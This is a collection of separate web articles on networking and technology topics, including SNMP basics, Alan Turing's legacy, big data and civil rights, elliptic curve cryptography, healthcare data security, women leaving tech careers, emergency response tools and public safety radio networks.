The system keeps the time internally in UTC and specifies a value for zone. The system displays the time for that zone. For more information you may wish to refer to: clock timezone | <urn:uuid:04e9415a-aa5c-4c4b-8996-3087dc8019ed> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2343993/cisco-subnet/how-to-configure-the-ntp-clock-timezone-command-on-a-cisco-router.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00543-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.855336 | 106 | 2.71875 | 3 |
SNMP for Everybody
Managing a small network isn't all that difficult. When something doesn't work, it's usually obvious where the fault lies. But even for a small network, having some kind of management and monitoring in place is helpful. As your network grows, it becomes even more important to have some tireless automated watchdogs keeping an eye on things.
The computer world is cram-full of monitoring, alerting, and management tools of all kinds, from nice free Open Source applications like MRTG, Cacti, Nagios, OpenNMS, and Mon, to expensive commercial suites that do everything but cook breakfast like ZenWorks, HP OpenView, and Tivoli. These perform a range of different duties, such as network discovery and mapping, providing real-time status indicators, reporting outages, tracking processes, disk usage, restarting downed servers and shutting down devices in trouble.
The one thing these all have in common is they are SNMP-aware. SNMP (Simple Network Management Protocol) has been around since the '80s. The idea was to create a standard protocol for managing IP (Internet Protocol) devices, rather than having a hodge-podge of different applications and suites that use differing, incompatible client agents.
When you start reading about SNMP, you'll encounter all kinds of new terminology and abbreviations. There are three main pieces in an SNMP-managed network: network management systems (NMS), sometimes called managers, agents and your managed devices. Agents are software modules in managed devices; think of these as the go-betweens that handle communications between devices and managers. Because SNMP provides a common standard, theoretically all devices with SNMP agents can be managed by any SNMP-aware management applications. Messages originate from both ends: managers can query agents, and agents can volunteer information to managers.
Some devices have agents built-in, like managed switches, routers, printers, power supplies and network access points. You can also install SNMP agents on servers or workstations to monitor just about anything that is monitor-able: CPU temperature, services, database performance, disk space, network card performance — you name it.
There are three versions of SNMP: SNMPv1, SNMPv2, and (guess what!) SNMPv3. SNMPv1 is the most widespread, and probably will be for some time to come. The main objection to v1 is the lack of security; all messages are sent in cleartext. v2 was developed to add security, but it seems that development got a bit out of hand and we ended up with four versions:
- SNMPv2 "star", or SNMPv2*
SNMPv3 is supposed to restore order and sanity, and it is a nice implementation that is easier to use and has real security, so over time it should replace v1 and v2.
There is a common set of SNMP commands across all versions: read, write, and trap. You've probably heard of "SNMP traps". Your manager uses the read and write commands: it polls for device information, which is stored by the agents as variables, and writes commands to devices, which means altering the variables. Managed devices emit traps asynchronously, which means when they have something urgent to say they don't wait for the manager to ask them what's up. For example, a router will report that it has lost Internet connectivity, or a server that it is overheating and melting down. Your manager will capture the trap and ideally do something sensible in response.
The ingenuity of SNMP is it doesn't require the managed devices to do anything other than report state, which places a trivial burden on them, and uses the manager to do all the heavy lifting, like evaluating the information it collects and deciding what to do with it. The NMS doesn't issue commands, but re-writes variables. This can be a bit weird to wrap your mind around, but the result is a very flexible, low-overhead system that is easy to implement across all kinds of devices by different vendors, and on different platforms.
SMI and MIB
No, not Stylish Mullets Irresistible and Men In Black, but Structure of Management Information and Management Information Base. This is fancy talk for all those device variables and how they are stored. Agents each keep a list of objects that they are tracking; then your manager collects and uses this information in hopefully useful ways. SMI is the syntax or framework used to define objects; MIB is the definitions for specific objects. Every object gets a unique Object Identifier (OID). These are managed in the same way as MAC addresses, with a central registry and unique allocations to hardware vendors.
All versions of SNMP use these five messages: GetRequest, GetNextRequest, SetRequest, GetResponse and Trap, which I believe explain themselves. SNMPv2 uses different message formats and protocol operations than v1, which pretty much renders it non-interoperable with v1. However, there workarounds. Some managers support both v1 and v2, or your v2 agents can act as v1 proxies. This means they translate messages between the manager and agent so that v1 devices can understand them.
RMON, or Remote Monitoring, is part of SNMP. It is an MIB module that defines a set of MIB objects for use by network monitoring probes. The SNMP framework is made up of dozens of MIB modules. Some are freely available, some are deep dark proprietary secrets, and of course you can always write your own. (See Resources for the online MIB validator, and to download MIBs.)
SNMP In Action
In future articles we'll dig into how to use SNMP with Linux-based network management applications. Until then, you can play around with SNMP to see what it looks like. On Debian, install the snmp andsnmpd packages. On Fedora, net-snmp-utils and net-snmp. The installers should start up the snmp daemon automatically. Then run this command:
#snmpwalk -v 1 -c public localhost system
This should spit out a bunch of output that looks something like this:
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (32) 0:00:00.32
SNMPv2-MIB::sysORID.1 = OID: IF-MIB::ifMIB
SNMPv2-MIB::sysORID.2 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.3 = OID: TCP-MIB::tcpMIB
Of course the man pages will tell you how to do more fun things, and the excellent O'Reilly book "Essential SNMP, 2nd Edition" by Douglas Mauro and Kevin Schmidt is a great practical guide to understanding and using SNMP.
Want to read the SNMP RFCs? Really? Well, allrighty then. Start here at this handy partial table of the relevant RFCs: | <urn:uuid:5f105bda-870b-49c1-abd0-8c89b4c74a45> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/3660916/SNMP-for-Everybody.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00359-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921698 | 1,494 | 2.578125 | 3 |
On Saturday, British mathematician Alan Turing would have turned 100 years old. It is barely fathomable to think that none of the computing power surrounding us today was around when he was born.
But without Turing's work, computers as we know them today simply would not exist, Robert Kahn, co-inventor of the TCP/IP protocols that run the Internet, said in an interview. Absent Turing, "the computing trajectory would have been entirely different, or at least delayed," he said.
For while the idea of a programmable computer has been around since at least 1837 -- when English mathematician Charles Babbage formulated the idea of his analytical engine -- Turing was the first to do the difficult work of mapping out the physics of how the digital universe would operate. And he did it using a single (theoretical) strip of infinite tape.
"Turing is so fundamental to so much of computer science that it is hard to do anything with computers that isn't some way influenced by his work," said Eric Brown, who was a member of the IBM team that built the "Jeopardy"-winning Watson supercomputer.
A polymath of the highest order, Turing left a list of achievements stretching far beyond the realm of computer science. During World War II, he was instrumental in cracking German encrypted messages, allowing the British to anticipate Germany's actions and ultimately help win the war. Using his mathematical chops, he also developed ideas in the field of non-linear biological theory, which paved the way for chaos and complexity theories. And to a lesser extent he is known for his sad demise, an apparent suicide after being persecuted by the British government for his homosexuality.
But it may be computer science where his legacy will be the most strongly felt. Last week, the Association of Computing Machinery held a two-day celebration of Turing, with the computer field's biggest luminaries -- Vint Cerf, Ken Thompson, Alan C. Key -- paying tribute to the man and his work.
Turing was not alone in thinking about computers in the early part of the past century. Mathematicians had been thinking about computable functions for some time. Turing drew from colleagues' work at Princeton University during the 1930s. There, Alonzo Church was defining Lambda calculus (which later formed the basis of the Lisp programming language). And Kurt Gödel worked on the incompleteness theory and recursive function theory. Turing employed the work of both mathematicians to create a conceptual computing machine.
His 1936 paper described what would later become known as the Turing Machine, or a-machine as he called it. In the paper, he described a theoretical operation that used an infinitely long piece of tape containing a series of symbols. A machine head could read the symbols on the tape as well as add its own symbols. It could move about to different parts of the tape, one symbol at a time.
"The Turing machine gave some ideas about what computation was, what it would mean to have a program," said James Hendler, a professor of computer science at the Rensselaer Polytechnic Institute and one of the instrumental researchers of the semantic Web. "Other people were thinking along similar lines, but Turing really put it in a formal perspective, where you could prove things about it."
On its own, a Turing Machine could never be implemented. For one, "infinite tapes are hard to come by," Kahn joked. But the concept proved invaluable for the ideas it introduced into the world. "Based on the logic of what was in the machine, Turing showed that any computable function could be calculated," Kahn said.
Today's computers, of course, use binary logic. A computer program can be thought of as an algorithm or set of algorithms that a compiler converts into a series of 1's and 0's. In essence, they operate exactly like the Turing Machine, absent the tape.
"It is generally accepted that the Turing Machine concept can be used to model anything a digital computer can do," explained Chrisila Pettey, who heads the Department of Computer Science at Middle Tennessee State University.
Thanks to Turing, "any algorithm that manipulates a finite set of symbols is considered a computational procedure," Pettey said in an interview via email.
Conversely, anything that cannot be modeled in a Turing Machine could not run on a computer, which is vital information for software design. "If you know that your problem is intractable, and you don't have an exponential amount of time to wait for an answer, then you'd better focus on figuring out a way to find an acceptable alternative instead of wasting time trying to find the actual answer," Pettey said.
"It's not that computer scientists sit around proving things with Turing Machines, or even that we use Turing Machines to solve problems," Pettey said. "It's that how Turing Machines were used to classify problems has had a profound influence on how computer scientists approach problem solving."
At the time Turing sketched out his ideas, the world had plenty of pretty sophisticated adding machines that would allow someone to perform simple calculations. What Turing offered was the idea of a general-purpose programmable machine. "You would give it a program and it would do what the program specified," Kahn explained.
In the next decade, another polymath, John von Neumann, at the Princeton Institute for Advanced Study, started working on an operational computer that borrowed from Turing's idea, except it would use random access memory instead of infinite tape to hold the data and operational programs. Called MANIAC (Mathematical Analyzer, Numerator, Integrator, and Computer), it was among the first modern computers ever built and was operational in 1952. MANIAC used what is now called the Von Neumann architecture, the model for all computers today.
Returning to Britain after his time at Princeton, Turing worked on another project to build a computer that used these concepts, called the Automatic Computing Engine (ACE), and pioneered the idea of a stored memory machine, which would become a vital part of the Von Neumann architecture.
As well as sparking the field of computer science, the impact his work had on cracking encryption may ultimately have also saved Great Britain from becoming a German colony. People have argued that Turing's work defining computers was essential to his success in breaking the encryption generated by Germany's Enigma machine -- work that helped bring World War II to an end.
"By today's definitions, the Enigma was an analog computer. What he [and his team] built was much closer to [the operations] of a digital computer," Rensselaer's Hendler explained. "Essentially he showed the power of digital computing in attacking this analog problem. This really changed the whole way that the field thought about what computers could do."
Having defined computational operations, Turing went on to play a fundamental role in defining artificial intelligence -- or computer intelligence that mimics human thinking. In 1950, he authored a paper that offered a way to determine if a computer possessed human intelligence. The test involves a person having an extended conversation with two hidden entities, a computer and a man pretending to be a woman. ("In both cases he wanted pretending," Hendler explained.) If the person can't determine which party is the computer, the machine can be said to think like a human.
"He wanted to put human and computing on equal footing," Hendler said. "Language is a critical skill for humans because it requires understanding and context. If a computer showed that level of understanding then you wouldn't notice the difference."
The test "has the advantage of drawing a fairly sharp line between the physical and the intellectual capacities of a man," Turing wrote in the original paper.
As IBM's Brown noted, Turing's legacy is still strongly felt today. In his mathematics work, he showed that "there exists problems that no decision process could answer," Hendler said. In terms of computers, this means, "You could never prove for all complicated computer programs that they are correct," Hendler said. "You could never write a computer program that could debug all other computer programs."
But far from restricting progress of computer science, the knowledge of such inconclusiveness paved the way for building previously unimagined technologies. It allowed engineers to create immensely helpful services such as Internet search engines, despite knowing that the answers such services were to provide would not always be complete.
"You have people who say we should never build a computing system unless we can prove it is secure. Those of us who understand Turing say, 'Well, you can't.' So you must start proving some approximation of secure, which starts a very different conversation," Hendler said.
And despite numerous attempts to beat the Turing Test, it still hasn't been done, except within the most limited of topics. That means we will likely be working to meet Turing's benchmarks for years to come.
"You can't say, 'Siri. How are you today?' and expect it to go on from there in any interesting way," Hendler said. | <urn:uuid:cf898608-7feb-47cd-82f7-89cc86dcc410> | CC-MAIN-2017-04 | http://www.itworld.com/article/2722685/it-management/how-alan-turing-set-the-rules-for-computing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00021-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973537 | 1,849 | 3.65625 | 4 |
A new report on the big data analytics sector from the White House has warned businesses that they must consider the ethical implications of their deployments and ensure that they are not discriminating against any individuals through their use of data.
The study, titled "Big Data: A Report on Algorithmic Systems, Opportunity, and Civil Rights" noted that if used correctly, big data can be an invaluable tool in overcoming longstanding biases and revisiting traditional assumptions.
For instance, by stripping out information such as race, national origin, religion, sexual and gender orientation, and disability, big data solutions have the potential to prevent discriminatory harm when it comes to activities such as offering employment, access to finance or admission to universities. However, the report warned that if care is not taken with the implementation of these technologies, they could exacerbate any problems.
One of the big challenges is that despite what many people assume, big data is not necessarily impartial. It can be subject to a range of issues such as imperfect inputs, poor logic and the inherent biases of the programmer.
"Predictors of success can become barriers to entry; careful marketing can be rooted in stereotype. Without deliberate care, these innovations can easily hardwire discrimination, reinforce bias, and mask opportunity," the study stated.
For instance, poorly selected data, incomplete or outdated details and unintentional historical biases could all result in the wrong data being input into big data systems. Meanwhile, poorly-designed algorithms can also cause problems if they assume correlation equals causation, or if personalised recommendations use too narrow a criteria to infer a user's true preferences.
The report highlighted several case studies that illustrate how big data can be used to improve outcomes – as well as some of the pitfalls that need to be avoided.
For example, it noted that many people in the US have difficulty gaining access to finance because they have limited or non-existent credit files. This is an issue that particularly affects African-American and Latino individuals, who are nearly twice as likely to be 'credit invisible' than whites.
Big data presents a great opportunity to improve access to credit, as it can draw on many more sources of information in order to build a picture of an applicant. This may range from phone bills, previous addresses and tax records to less conventional sources, such as location data derived from use of cellphones, social media data and even how quickly an individual scrolls through a personal finance website.
However, it warned: "While such a tool might expand access to credit for those underserved by the traditional market, it could also function to reinforce disparities that already exist among those whose social networks are, like them, largely disconnected from everyday lending.
"If poorly implemented, algorithmic systems that utilise new scoring products to connect targeted marketing of credit opportunities with individual credit determinations could produce discriminatory harms."
The report also included a number of recommendations for improving big data outcomes, such as increasing investments in research, improving training programmes, and developing clear standards for both the public and private sector.
"Big data is here to stay; the question is how it will be used: to advance civil rights and opportunity, or to undermine them," it added. | <urn:uuid:1c6095ab-1de9-4356-b514-048e72177fa1> | CC-MAIN-2017-04 | http://kognitio.com/white-house-warns-on-big-data-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00507-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946827 | 640 | 2.765625 | 3 |
In 2011, we saw a huge increase in the number of major breaches of Protected Health Information (PHI) due to the loss or theft of unencrypted devices. The largest of these breaches was experienced by Sutter Health of California which suffered the theft of a computer containing more than four million patient records. The data for about 3.3 million of these patients included their names, addresses, dates of birth, phone numbers and email addresses. The remaining 943,000 records also contained medical diagnoses and services provided.
With such a huge risk of data loss from just one end-user device, it may be a good time to reevaluate the client/server infrastructure in the offices of healthcare providers.
Server-based computing has been around seemingly forever. Anyone who has ever interacted with a "terminal" or "green screen" has used server-based computing. There was no data processing or storage on the end-user device; it was all handled by the server on the other end of the connection.
The advent of PC-based computing, especially in private physician practices, came about largely because end users needed more functionality than a terminal alone could provide, and also because it became increasingly difficult to purchase replacements for failed devices. Unfortunately, the adoption of PCs in medical practices has contributed heavily to the decline in the overall security of patient information.
Server-based computing can really be thought of as a "remote desktop." The desktop that you are interacting with is actually hosted on another system in a remote location. Depending on the type of system that is implemented, the desktop will provide the end user with either dedicated or shared computing resources such as memory, processor and storage.
The traditional server-based computing systems from Citrix and Microsoft are systems that share computing resources among the connected users. Because of limited server resources and the need for high availability, these systems provide end users with limited customization, and system maintenance can affect a large number of those users.
A growing technology, VDI or Virtual Desktop, is another type of server-based computing system that provides dedicated computing resources to the end user. This means that a user is provided with a remote desktop session into a dedicated operating system with dedicated processor, memory and storage. With the resources being dedicated, the user has the ability to make customizations that would not be possible on a shared resource system. Any issues with the system that require troubleshooting by the IT staff only affects that end user and no one else as this is an isolated system.
This solution helps fulfill some of the regulatory requirements for data security because:
- The centralized data processing and storage capability allows end users to use "thin" devices that are not capable of data storage. This removes the possibility that patient information can be accidentally or maliciously stored on an end user device.
- The server-based computing infrastructure is in a central location (main office, datacenter, etc.) so the physical access to these systems is limited.
Learn more about cloudSHIFTSM Desktop – virtual desktop services from mindSHIFT Technologies
For more information on ePHI, read my previous post: "Do you know where your ePHI is?"
Chris Cline is a Senior Sales Engineer at mindSHIFT Technologies, Inc., based in our Morrisville, NC office. | <urn:uuid:afaec230-cfbc-4af9-8f5a-b5e1bcfd6b0e> | CC-MAIN-2017-04 | http://www.mindshift.com/Blog/2012/February/Securing-ePHI-with-Server-Based-Computing.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00323-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94881 | 670 | 2.59375 | 3 |
What if half the men in science, engineering and technology roles dropped out at midcareer? That would surely be perceived as a national crisis. Yet more than half the women in those fields leave -- most of them during their mid- to late 30s.
In this month's Harvard Business Review, Sylvia Ann Hewlett, Carolyn Buck Luce and Lisa J. Servon describe the Athena Factor, their research project examining the career trajectories of such women. Hewlett, founding president of the Center for Work-Life Policy in New York, told Kathleen Melymuka about what they learned.
Your research shows that there are more women on the lower rungs of science and technology fields than most people suspect. Women are actually excelling in science, engineering and technology, despite the fact that the schools are not very good at encouraging them. Many don't just survive the educational process but get some distance in terms of careers. The story is very encouraging in the early run. Between ages 25 and 30, 41% of the young talent with credentials in those subject matters are female. It's a more robust figure than many suspect. That's the good news.
What happens later? The bad news is that a short way down the road, 52% of this talent drops out. We are finding that attrition rates among women spike between 35 and 40 -- what we call the fight-or-flight moment. Women vote with their feet; they get out of these sectors. Not only are they leaving technology and science companies, many are leaving the field altogether.
How many women are we talking about? We reckon that maybe a million well-qualified women are dropping out in that age range. We reckon that if you could bring the attrition rate down by 25%, you would hang on to about a quarter of a million women with real experience and credentials in these fields -- fields that are suffering a labor shortage.
Based on the demographics, it seems likely that they leave to start families. Is that what happens? No. I'm not trying to pretend that work-life balance is not important, but we found four other more important factors about the culture and the nature of the career path. We call them "antigens," because they repel women.
Tell me about those. The most important antigen is the machismo that continues to permeate these work environments. We found that 63% of women in science, engineering and technology have experienced sexual harassment. That's a really high figure.
They talk about demeaning and condescending attitudes, lots of off-color jokes, sexual innuendo, arrogance; colleagues, particularly in the tech culture, who genuinely think women don't have what it takes -- who see them as genetically inferior. It's hard to take as a steady stream. It's predatory and demeaning. It's distressing to find this kind of data in 2008.
Is this data global or national? We studied private-sector employers in the U.S., and then we looked at three large, global companies with women working across the world. We also did a bunch of focus groups in Australia, Shanghai and Moscow. The data were pretty consistent. Actually, India is a little better than the U.S. But there's not much variation across geography. | <urn:uuid:bfef23d1-cb33-4511-b729-6c0c15752ed3> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2551969/it-careers/why-women-quit-technology.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00075-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.971143 | 667 | 2.640625 | 3 |
Rising waters overflow stream and river banks, masses of mud slide over freeways, and snow piles so high, it causes power outages and forces road closures. Last winter, dozens of news reports told of families stranded or left homeless, property wrecked and muddied by flood waters, houses crunched by fallen trees, and pets and livestock abandoned by owners forced to evacuate.
With all of the subsequent cries for help from victims of floods, blizzards, hurricanes, fires and earthquakes, emergency response agencies had to be on alert and well-prepared. Many agencies rose out of the chaos and helped increase public confidence. One such agency was the California, Office of Emergency Services (OES) which successfully responded to the Sacramento Valley floods of '97. One of the heroes that shined during this tense situation wasn't a person, but a system -- the Response Information Management System (RIMS), which consists of 10 to 15 servers, 500 to 800 PCs and multiple, redundant communication networks.
"The most important function of an emergency response organization is being able to coordinate, allocate and move resources to get help to those who need it as fast as possible," said John Bowles, chief of the information branch of OES. "Technology helped us to do that."
RIMS is an example of how technology, correctly applied, helps government agencies effectively respond and manage emergency situations. Agencies who haven't put an effective system in place, or who are looking to upgrade or expand an existing one, will be overwhelmed at the many products available. All one has to do is perform a Net search and plug in the words "computer-aided dispatch" and "emergency response" to uncover literally hundreds of companies and products. So here is a rundown of some of the latest products and techniques helping to save lives.
Lotus Notes -- a component of the OES RIMS system -- is a pro at helping agencies manage and coordinate workflow during emergencies. The program's interface makes information easy to find and accessible on the fly by allowing users to point and click to retrieve data. It integrates information from a number of sources, allowing agencies with different applications to share information within the Notes system. It also combines information from desktop applications, relational databases, legacy systems and the Internet.
In an emergency situation, users who deal with hundreds of resource requests simultaneously are able to use these tools to respond, manage and coordinate requests faster and more effectively.
The program also makes it easy to automate business processes, because it's a distributed knowledge system. It features tools to build workflow applications that route information and store content and logic of the work. During an emergency, proper workflow management allows users to send resource requests automatically through a standard process and reduce processing time.
The database gives users the ability to assemble, manage and share compound documents. Information generated from the Internet, relational databases and legacy systems can be integrated into a Notes document. Users can also embed objects, sound, video and data in a document. Teams can then quickly communicate and share knowledge. This also provides accuracy, as a team can determine what occurred during an emergency effort and a chronology of events -- a clear historical record of when actions were taken.
Lotus Notes also offers dozens of other features that help teams create applications to suit a particular disaster, design applicable time reporting, fiscal tracking, inventory management programs and more.
For further details, contact Paul Christman, state and local sales manager for Lotus, at 800/346-1347.
Hit The Spot
For up-to-the-minute overhead images for use during fires and floods, Spot Image offers an array of system services to provide assistance. Spot satellite programming services feature mapping production and updating, cropping patterns, digital elevation models, contour lines, slope and insolation maps and more. The satellites keep a constant eye on the Earth's surface from its orbit more than 500 miles overhead. For example, after a fire, Spot can provide rapid response imagery to help officials map out the extent of the damage by providing an image that might show the area covered by a fire scar.
Users can select Spot's programming service by purchasing different packages, which include red, blue, stereo and turnkey services. Red service provides users with exclusive rights to the number of imaging attempts needed for the person's studies, situation analysis, monthly reports on imaging attempts and more; the blue service is used for non-urgent requests; stereo services is for acquiring Spot stereopairs or stereoscopic coverage of broad areas; and turnkey services offer hands-on services for single images or an entire project.
For more information, contact Spot Image Corp., 1897 Preston White Dr., Reston, VA 22091. Call 703/715-3137 or send e-mail to email@example.com.
Public Safety and More
International Public Safety (formerly Intergraph Public Safety) has long been a provider of emergency response systems to state and local governments. It offers a wide range of applications, from I/Management and Reporting System (I/MARS) to I/Calltaker, and from I/Dispatcher to I/Computer Aided Dispatch system (I/CAD).
I/MARS allows users to extract data from various systems and turn that data into information. It can assimilate data from a variety of sources in existing systems and integrate it with the I/MARS programs. In turn, this information can be presented in many forms, including charts, maps, graphs and reports. When an accident occurs, reliable information about the time and place of the incident can be provided for informed decision-making. This information can then be compiled and used for analysis. For example, although you cannot predict when a specific accident might happen in a traffic intersection, you can use the system to calculate the probability of it happening on a specific day at a specific hour.
I/Calltaker performs call-taking and incident-entry functions in all public safety dispatch environments. I/Calltaker allows each agency's communication center to customize forms to accommodate its own way of gathering and reporting data. An on-screen form shows operators what information to record while the automatic number identification and automatic location information program takes data from the Enhanced 911 telephone database and loads it into the form. Some of its other functions include event location processing, customization of event types, areas for dispatchers to make remarks associated with the emergency and the ability to check the location of the event.
Considered the hub of Intergraph's safety solutions, I/CAD helps dispatchers make better judgment calls when dispatching resources in an emergency. It features incident entry, two-way communication with mobile resource units in the field, and provides a single system to store, use and report information including addresses, incident histories, hospital downtime and unit activities. It also features fully interactive maps that include information on streets, highways, building blueprints, HAZMAT flags, fire hydrants, power lines, rivers, lakes, railroad lines and more. An operator can query the system and route units to locations by the shortest time, distance, fewest turns or intersections and other criteria.
For more information, contact International Public Safety at 800/345-4856 or visit its Web site at http://www.intergraph.com.
Calls From The Field
Communication is probably one of the most important elements in any emergency situation. Emergency crews have to be able to call in and get accurate directions during a crisis. This is why a top-notch, reliable cellular phone is crucial during disasters of any kind. Perhaps one of the most popular cellular phone product lines comes from Motorola. It offers an extensive line of cellular phones to meet a variety of needs, including the StarTAC 8600, the Profile Series 300, the Secure Clear models 3325 and 3367, and the Populous.
The StarTAC 8600 is a wearable model that weighs 3.1 ounces and offers an answering machine/voice recorder function. VoiceNote provides up to four minutes of record time and acts as a kind of voice memo system. It also features two removable Lithium Ion batteries for 51 hours of standby time, a VibraCall alert feature to receive incoming calls, a headset jack for use with an optional headset and a portfolio of accessories.
The Profile Series 300 features an enlarged, two-line display that uses graphic elements such as dedicated battery and signal meters. It also features nine Turbo Dial locations, a headset jack, data capabilities and a car kit. It boasts up to 70 minutes of talk time and 12 hours of standby time with a Nickel Metal Hydride battery. For added security, it can be programmed with a PIN code for markets that offer this service.
If security is a concern, check out the Secure Clear models 3325 and 3367, which offer caller ID and call waiting to identify incoming and outgoing callers. These phones feature backlit display and keypad; a 20-character, two-line display that shows name, number, date and time; 50 caller-ID records; and 25-channel automatic scanning.
Motorola's latest addition to their cellular family is the Populous, a slim phone that weighs just 8.2 ounces and runs off a NiCd battery pack. It features a large keypad, colorful display, simplified programming, nine selectable ringer tones, TurboDial keys, a built-in battery meter and fraud protection. Other advantages include a charging time of 1.5 hours, 180 minutes of talk time or 30 hours of standby time, the ability to use four standard AA batteries and more.
For further details, contact Motorola Cellular Subscriber Sector, 600 N. U.S. Highway 45, AN482, Libertyville, IL 60048. Call
800/331-6456 or visit its Web site at http://www.startac.com.
Michelle Gamble-Risley is the publisher of California Computer News. E-mail: firstname.lastname@example.org.
August Table of Contents | <urn:uuid:b8681c43-e4f2-4ea5-85cf-90950ba7e27c> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Product-Focus-Emergency-Response-Tools-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00314-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920499 | 2,052 | 2.765625 | 3 |
Recently, there have been many advances in cracking encryption algorithms that are the basis for the most common cryptography systems, such as Diffie-Hellman, RSA and DSA. Experts warn that within the next several years, the RSA public key cryptography system could even potentially become obsolete. If that is the case, how will enterprises be able to ensure secure remote access in the near-future?
First, let’s take a look at the problem itself. Encryption algorithms ensure security by utilizing the assumption that certain mathematical operations are exponentially difficult, such as the problems of integer factorization and the discrete logarithm, to prevent the decryption of public and private keys. As the key length increases, it becomes exponentially harder to decrypt, which is why key sizes are typically 128 bits and above.
After more than 30 years of little progress, researchers have recently started creating faster algorithms for limited versions of the discrete logarithm problem, which has rung the alarm for the entire cryptographic community. It has made us realize that we need to implement a more secure standard, Elliptic Curve Cryptography (ECC).
ECC is the best option moving forward for secure remote access via VPNs, because it is based on an operation that not only is difficult to solve but also is a very different problem from the discrete logarithm and integer factorization. Due to its unique characteristics, it is not impacted by advances in decrypting cryptography systems that utilize either of those problems. Currently, ECC is still not widely in use, but that is starting to change. It is particularly important for enterprises to implement ECC over the next several years to improve network security, because if decryption advances proceed at the current rate, TLS, a common protocol that ensures secure communications over the Internet, will be vulnerable to hackers until TLS 1.2, which includes ECC support, becomes widely available. If TLS communications can be decrypted, hackers could steal sensitive data, such as corporate financial information and documents, or even gain complete access to a corporate network to bring it down from the inside.
Implementing ECC right now will ensure that the worst case scenario will not happen. It’s time for enterprises to stay ahead of the curve, and use ECC to protect remote access to their corporate networks.
This post originally appeared on VPNHaus.com. | <urn:uuid:d681f310-51d3-4a1c-b2e3-c5b2e39f16bb> | CC-MAIN-2017-04 | http://infosecisland.com/blogview/23360-Why-Elliptic-Curve-Cryptography-is-Necessary-for-Secure-Remote-Access.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950574 | 482 | 3.125 | 3 |
Police officers and firefighters carry $5000 radios. Local and state governments spend hundreds of millions of dollars to build public safety radio networks. Yet, today, cell phone networks seem to be everywhere, most people carry a mobile phone and many of us think paying $199 for an iPhone is expensive.
Why can't cops and firefighters and emergency medical technicians (EMT) use cell phones like everyone else? A Washington State legislator from Seattle recently public argued for this approach in his blog. And, at first, this appears to be a simple way for governments to save a lot of taxpayer dollars.
Here are a few reasons public safety officers need their own dedicated networks:
- Priority. Cellular networks do not prioritize their users or traffic. A teenager's cell phone has the same priority as a cell phone used by a police officer or, for that matter, the BlackBerry used by President Obama. We've all experienced "no circuits available" or "network busy" when using a cell phone. When I'm being assaulted or have been injured in an automobile accident or even have had my house burglarized, the last thing I want is to have the network be "busy" so a police officer or EMT couldn't be dispatched. Public safety needs dedicated frequencies where police officer sand firefighters have priority and even, perhaps, exclusive rights to for use, without calls being clogged by the public.
- Reliability. Seattle's public safety radio network, part of the larger King County-wide 800 megahertz public safety radio network, handles more than 60,000 police, fire and emergency medical calls every day. It operated last year with 99.9994% reliability - that's about 189 seconds of downtime out of more the than 31 million seconds which composed the year 2009. On the average, only about five out of the 60,000 calls were delayed for any reason, and even then the average delay was about two seconds. What cell phone network has that kind of reliability? How many times have you experienced "no service" or "call dropped" with your cell phone? Do we want firefighters who are reviving a heart attack victim and talking to the emergency room on the radio to all-of-a-sudden have their call dropped? Or should police officers lose service when drunk drivers clog the roads and bars are closing at 2:00 AM because a cell phone company decides to do maintenance because "no one uses the network then"?
- Disasters. Even small disasters cause cell phone networks to collapse. In Seattle, we've had swat team actions or car accidents which have shut down a freeway. Suddenly cell phone service abruptly ceases in that area because EVERYONE is on their phone. A few years ago a rifleman was loose and shooting people in Tacoma Mall. Responding police and EMTs had communications because they had dedicated networks and frequencies, but again cell phone networks were overloaded and down. In a larger disaster such as an earthquake or hurricane (with associated evacuation of large cities), commercial networks will be overloaded or jammed for days by people trying to escape the affected areas. Do we want police and fire departments - or even transportation, electric utilities and public works departments - to be trying to use those same networks while they are are responding to the disaster? I don't think so.
- Talk-around. A key feature of most government-operated networks is something called talk-around or simplex or "walkie-talkie" mode. In this mode, individual radios talk directly to each other, without using a radio or cell tower. This is very important at incident scenes - firefighters commonly use it at the scene of a fire, because the radios will operate at the scene even if there isn't a tower nearby. But this NEVER a feature of cellular phone networks. If the cell tower is down or out of range, that cell phone in your hands is a useless lump of plastic. But the radios of publicsafety officers still work and will talk to each other even without the tower.
- Ruggedness. No firefighter in his/her right mind would fight a fire using a cell phone for communications. The heat, water and ruggedness of the environment would quickly destroy the device. Yet most public safety radios will survive being dropped repeatedly on the ground or being immersed in water for 30 minutes or more. No standard cell phone can survive the rigorous work of firefighting or policing.
Are there problems with the current dedicated public safety networks? Absolutely. The use proprietary technologies, for example "Project 25". Theoretically all "Project 25" radios work on any "Project 25" radio system. But only a few of those are deployed around the nation. These proprietary technologies are one reason the radios cost up to $5,000 each.
